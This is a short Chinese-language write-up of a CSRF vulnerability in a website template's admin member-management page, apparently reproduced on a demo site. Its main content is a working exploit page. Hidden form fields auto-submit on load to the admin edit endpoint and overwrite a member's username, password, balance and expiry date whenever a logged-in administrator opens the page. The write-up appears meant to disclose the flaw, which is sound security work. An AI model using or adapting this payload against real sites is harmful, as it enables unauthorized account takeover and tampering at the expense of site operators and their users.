漏洞概述
使用演示网站进行漏洞复现。如下进入模板风格-4演示站后台
会员管理页面
任意修改用户信息,抓包如下
尝试repeater发现其未对Refer字段进行检测,也没有使用token验证,存在CSRF漏洞。管理员登陆后台后,访问hacker发来的如下页面,可以实现任意修改会员账号、密码、金币、到期时间等信息
exp代码如下:
<!DOCTYPE html> <html> <head> <title> CSRF Proof</title> <script type="text/javascript"> function exec1(){ document.getElementById('form1').submit(); } </script> </head> <body onload="exec1();"> <form id="form1" action="http://www.0dayhack.com/admin/member/edit.html" method="POST"> <input type="hidden" name="username" value="hacker1" /> <input type="hidden" name="nickname" value="hacker1" /> <input type="hidden" name="email" value="hacker1" /> <input type="hidden" name="tel" value="hacker1" /> <input type="hidden" name="password" value="hacker1" /> <input type="hidden" name="out_time" value="1970-01-01" /> <input type="hidden" name="money" value="30" /> <input type="hidden" name="is_permanent" value="0" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="id" value="821" /> </form> </body> </html>
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论